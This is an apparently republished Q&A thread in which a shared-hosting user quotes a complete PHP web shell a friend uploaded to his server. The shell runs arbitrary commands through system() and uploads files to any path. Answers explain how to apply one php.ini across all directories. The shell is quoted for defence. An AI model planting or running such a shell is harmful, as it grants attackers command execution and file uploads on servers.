Tutorial :How do I enable my php.ini file to affect all directories/sub-directories of my server?



Question:

A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

<?php  if(isset($_REQUEST['cmd'])) {      echo "<pre>";      $cmd = ($_REQUEST['cmd']);      system($cmd);      echo "</pre>";      die;  }  ?>    <?php  if(isset($_REQUEST['upload'])) {      echo '<form enctype="multipart/form-data" action=".config.php?send" method="POST">          <input type="hidden" name="MAX_FILE_SIZE" value="5120000" />          Send this file: <input name="userfile" type="file" />          To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />          <input type="submit" value="Send File" />      </form>';  }  ?>    <?php  if(isset($_REQUEST['send'])) {      $uploaddir = $_POST["direct"];      $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {          echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;      } else {          echo "Upload failed";      }  }  ?>  

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?


Solution:1

One, kick off a "friend" that chooses to run scripts like this.

Then worry about securing your server. Your system has a master php.ini somewhere (often /etc/php.ini, but if can be in several places, check php_info()). That file controls the default settings for your server. Also, you can block local settings files that allow overrides.


Solution:2

Wow! move the php.ini file on a per-directory basis? Didnt know you could do that.

My best guess (someone please correct me if im wrong), php probably overrides the global php.ini file with a local set of rules on a per-directory basis (much like .htaccess), so basically all you would need to do is to update your php.ini directives to the global php.ini (found here in ubuntu: etc/php5/apache2/php.ini)

Alternatively, you might want to try to use .htaccess to prepend a php page onto all pages with the following:

ini_set('your_directive')  

Of course, make sure the .htaccess which calls the prepend php sits at the root, else you're stuck with the same issue.

/mp


Solution:3

Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.


Solution:4

Are you sure? I wish I had your ISP. By default some ISPs will provide a local copy of the ini file in public_html to allow overrides. But cPanel usually only provides a reference of the server-wide defaults.


Note:If u also have question or solution just comment us below or mail us on toontricks1994@gmail.com
Previous
Next Post »